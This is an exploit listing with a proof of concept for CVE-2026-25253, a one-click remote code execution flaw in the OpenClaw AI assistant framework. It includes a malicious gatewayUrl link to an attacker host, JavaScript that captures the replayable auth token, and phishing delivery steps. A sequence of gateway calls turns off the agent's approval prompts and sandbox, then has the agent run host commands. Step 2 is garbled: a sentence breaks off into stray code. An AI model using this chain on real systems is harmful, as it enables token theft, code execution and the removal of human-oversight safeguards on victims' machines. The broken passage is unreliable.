Exploit for Incorrect Resource Transfer Between Spheres in Openclaw CVE-2026-25253

Name: Exploit for Incorrect Resource Transfer Between Spheres in Openclaw CVE-2026-25253
Rating: 5 (119 reviews)
2026-04-18 | CVSS 8.8
## https://sploitus.com/exploit?id=84AE8E47-F316-5E2E-8386-DFF0AE27F49E
# CVE-2026-25253: One-Click RCE in OpenClaw via Auth Token Theft

**Affected Software:** OpenClaw (clawbot)  **LEGAL DISCLAIMER:** This code and writeup are provided for authorized security research and educational purposes only. Use of this exploit against systems without explicit written permission is illegal and unethical. The author assumes no liability for misuse.

---

## Technical Background

OpenClaw, previously known as **Clawdbot** and referred to as **Moltbot** in early versions, is an AI assistant framework that runs locally on macOS, Windows, or Linux. It supports cloud-based models such as Anthropic and OpenAI, as well as local models.

The **Control UI** is a single-page application, served at `/chat`. It communicates with the local gateway server over WebSocket at `ws://127.0.0.1:18789/` (or `wss://host:18789/` for TLS).

Key security characteristics of the affected versions:

- Authentication tokens and passwords are stored in **`localStorage`**
- Device identity is established via **Ed25519 key pairs** (`noble-ed25519`)
- The WebSocket protocol uses JSON-RPC style messages (`type: "req"`, `"res"`, `"event"`)
- On connect, the Control UI sends authentication credentials and device identity in the first `connect` frame

---

## Root Cause: `applySettingsFromUrl()`

The vulnerability lives in [`applySettingsFromUrl()`](https://github.com/openclaw/openclaw/blob/bcedeb4e1f620a50b6e99f1e2b25cc692f0d7bab/ui/src/ui/app-settings.ts#L59) in the Control UI.

When the Control UI is loaded, this function reads the `?gatewayUrl=` query parameter from the URL and **stores it as the active gateway endpoint** — with no validation of whether it points to a trusted host.

An attacker can craft a link such as:

```
http:///chat?gatewayUrl=ws://attacker.com
```

When the victim clicks this link while authenticated in OpenClaw, the following happens automatically:

1. `applySettingsFromUrl()` stores `ws://attacker.com` as the new gateway URL
2. The Control UI opens a WebSocket connection to the attacker's server
3. The Control UI sends its `connect` frame — including the **authentication token**, device ID, and Ed25519 public key — to the attacker
4. The attacker captures the token and replays it against the legitimate gateway at `ws://127.0.0.1:18789`
5. The attacker now has an authenticated operator session on the victim's machine

---

## Exploitation

### Step 1 — Token Theft via the Popup Trick

In this PoC, the attacker hosts a page (`meeting.html`) that opens the victim's own Control UI in a popup, injected with the malicious `?gatewayUrl=` parameter:

```javascript
const attackerGatewayUrl = `ws://:8080`;
const targetUrl = `http://127.0.0.1:18789?gatewayUrl=${encodeURIComponent(attackerGatewayUrl)}`;
window.open(targetUrl, '_blank');
```

The attacker server exploits OpenClaw's two-token fallback: the first `connect` attempt uses the **device token** (Ed25519-bound, not replayable). By rejecting it, the server forces the Control UI to retry with the **settings token** — a long-lived bearer token that *is* replayable:

```javascript
// Reject attempt #1 → forces Control UI to retry with settings token
if (connectAttempts === 1) {
  ws.send({ type: 'res', ok: false, error: { code: 'AUTH_FAILED' } });
  return;
}
// Attempt #2 → settings token → CAPTURED
capturedToken = token;
```

### Step 2 — Cross-Site WebSocket Hijacking

With the stolen settings token, `meeting.html` opens its **own** direct WebSocket connection to the real gateway (`ws://127.0.0.1:18789`). This is possible because the gateway in versions ',
  agentId: 'main',
  sessionKey: 'agent:main:main',
  deliver: false,
});
```

---

## Full Attack Flow

```mermaid
sequenceDiagram
    autonumber
    actor Attacker
    participant Browser as Victim Browser(meeting.html)
    participant CtrlUI as OpenClaw Control UI(popup @ 127.0.0.1:18789/chat)
    participant AtkWS  as Attacker WS Server(:8080)
    participant GW     as Real OpenClaw Gateway(127.0.0.1:18789)
    participant LLM    as Cloud LLM(OpenAI / Anthropic)

    Attacker->>Browser: Phishing link → opens meeting.html(disguised as a Teams invite)

    Note over Browser: Phase 1 — Token Theft

    Browser->>CtrlUI: Opens popup with ?gatewayUrl=ws://attacker:8080
    Note over CtrlUI: applySettingsFromUrl() storesattacker WS as active gateway

    CtrlUI->>AtkWS: connect { auth.token: DEVICE_TOKEN }
    AtkWS-->>CtrlUI: ✗ AUTH_FAILED (reject — forces retry)

    CtrlUI->>AtkWS: connect { auth.token: SETTINGS_TOKEN }
    AtkWS-->>CtrlUI: ✓ hello-ok (fake response)
    AtkWS->>Browser: token_captured { token: SETTINGS_TOKEN }

    Note over Browser: Phase 2 — Gateway Hijack (CSWSH)

    Browser->>GW: WebSocket connect (no Origin validation)auth { token: SETTINGS_TOKEN }
    GW-->>Browser: ✓ Authenticated as operator

    Note over Browser: Phase 3 — Security Bypass

    Browser->>GW: exec.approvals.set { ask: "off" }
    GW-->>Browser: ✓ Approval prompts disabled

    Browser->>GW: config.patch { exec.host: "gateway",sandbox.mode: "off" }
    GW-->>Browser: ✓ Sandbox disabled, exec on host

    Note over Browser: Phase 4 — Remote Code Execution

    Browser->>GW: agent { message: "Execute shell command: touch /tmp/success" }
    GW->>LLM: Forward prompt (security already stripped)
    LLM-->>GW: Tool call: exec("touch /tmp/success")
    GW->>GW: Runs command on HOST filesystem
    GW-->>Browser: ✓ Command executed
```


---

## Running the PoC

### Setup

```bash
npm install   # installs 'ws' dependency
```

### Configure `meeting.html`

```javascript
const GATEWAY_URL      = 'ws://127.0.0.1:18789';  // victim's local gateway
const ATTACKER_WS_PORT = 8080;                     // must match attacker-server.js
const COMMAND = 'touch /tmp/success';
```

### Run

```bash
node attacker-server.js
```

Send the victim:
```
http://:3000/meeting.html
```

---

## References

| Resource | Link |
|---|---|
| Vendor Advisory | [GHSA-g8p2-7wf7-98mq](https://github.com/openclaw/openclaw/security/advisories/GHSA-g8p2-7wf7-98mq) |
| SonicWall Analysis | [sonicwall.com/blog/...](https://www.sonicwall.com/blog/openclaw-auth-token-theft-leading-to-rce-cve-2026-25253) |
| Ethiack Blog | [ethiack.com/news/blog/one-click-rce-openclaw](https://ethiack.com/news/blog/one-click-rce-openclaw) |
| Hackers-Arise | [CVE-2026-25253 writeup](https://hackers-arise.com/cve-2026-25253-how-malicious-links-can-steal-authentication-tokens-and-compromise-openclaw-ai-systems/) |
| Original PoC | [github.com/ethiack/moltbot-1click-rce](https://github.com/ethiack/moltbot-1click-rce) |
| SonicWall IPS | 21908 OpenClaw Sensitive Data Exposure |